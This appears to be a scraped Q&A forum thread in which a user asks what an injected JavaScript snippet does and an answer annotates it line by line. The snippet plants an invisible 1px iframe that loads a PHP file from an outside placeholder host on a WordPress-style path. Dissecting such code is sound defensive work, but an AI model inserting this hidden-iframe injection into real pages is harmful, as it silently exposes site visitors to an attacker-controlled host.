What exactly is this malicious javascript code doing?
JavaScript
x
17
17
1
(function () {2
var qk = document.createElement('iframe');3
4
qk.src = 'http://xxx.tld/wp-includes/dtd.php';5
qk.style.position = 'absolute';6
qk.style.border = '0';7
qk.style.height = '1px';8
qk.style.width = '1px';9
qk.style.left = '1px';10
qk.style.top = '1px';11
12
if (!document.getElementById('qk')) {13
document.write('<div id='qk'></div>');14
document.getElementById('qk').appendChild(qk);15
}16
})();17
The website at http://xxx.tld/wp-includes/dtd.php just returns OK.
Advertisement
Answer
It is:
JavaScript
1
26
26
1
(function () {2
var qk = document.createElement('iframe'); // creating an iframe3
4
qk.src = 'http://xxx.tld/wp-includes/dtd.php'; // pointing it at a webpage5
6
/*7
making the iframe only take up a 1px by 1px square8
in the top left-hand corner of the web page it is injected into9
*/10
qk.style.position = 'absolute';11
qk.style.border = '0';12
qk.style.height = '1px';13
qk.style.width = '1px';14
qk.style.left = '1px';15
qk.style.top = '1px';16
17
/*18
Adding the iframe to the DOM by creating a <div> with an ID of "qt"19
(If the div has not been created already)20
*/ 21
if (!document.getElementById('qk')) {22
document.write('<div id='qk'></div>');23
document.getElementById('qk').appendChild(qk);24
}25
})();26
When the iframe is injected into the DOM the browser will make a request to http://xxx.tld/etc. It is most likely doing this to track hits on your site.